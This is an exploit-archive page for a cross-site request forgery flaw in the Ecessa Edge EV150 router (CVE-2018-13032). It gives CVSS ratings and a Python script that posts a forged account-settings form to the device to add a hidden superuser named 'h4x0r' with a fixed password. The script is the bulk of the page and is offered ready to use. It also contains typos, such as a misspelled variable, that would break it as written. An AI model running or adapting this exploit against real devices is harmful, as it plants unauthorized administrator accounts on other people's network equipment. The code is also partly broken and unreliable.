Ecessa Edge EV150 CrossSiteRequestForgery(Add Superuser)

2019.03.26
us BehzaDghat (US) us
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/pythono #Exploit Title: #Date: 3/25/2019 #Exploit Author: BehzaDghat #Version: 10.7.4 #CVE : 2018-13032 import sys import requests au='/cgi-bin/pl_web.cgi/util_configlogin_act' def help_message(): print """ {} -h ---> show this message {} -u URL ---> start exploit example: {} -u http://target.com """.format(sys.argv[0],sys.argv[0],sys.argv[0]) def error_optiont(): print """\ntype and enter {} -h""".format(sys.argv[0]) data_fs={'savecrtcfg':'checked','user_username1':'root','user_enabled1':'on','user_passwd1':'','user_passwd_verify1':'', 'user_delete1':'','user_username2r':'admin','user_passwd2':'','user_passwd_verify2':'','user_delete2':'', 'user_username3':'user','user_enabled3':'on','user_passwd3':'','user_passwd_verify3':'','user_delete3':'', 'user_username4':'h4x0r','user_enabled4':'on','user_superuser4':'on','user_passwd4':'123123','user_passwd_verify4':'123123', 'page':'util_configlogin','val_requested_page':'user_accounts','savecrtcfg':'checked' ,'page_uuid':'3e2774f9-1cd3-4d36-a91e-eb9e42b5ba0d', 'form_has_changed':'1','submit':'Supersize!'} if len(sys.argv)>1 and sys.argv[1]=='-h': help_message() exit() elif len(sys.argv)==3 and sys.argv[1]=='-u': urlt=sys.argv[2]+au if '200' in str(requests.get(urlt)): print 'Send DATA' r=requests.post(urtl,data=data_fs) if '200' in str(r): print 'Added User' else: print 'Not Found Page' else: print 'Type And Enter -> python {} -h'.format(sys.argv[0])


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top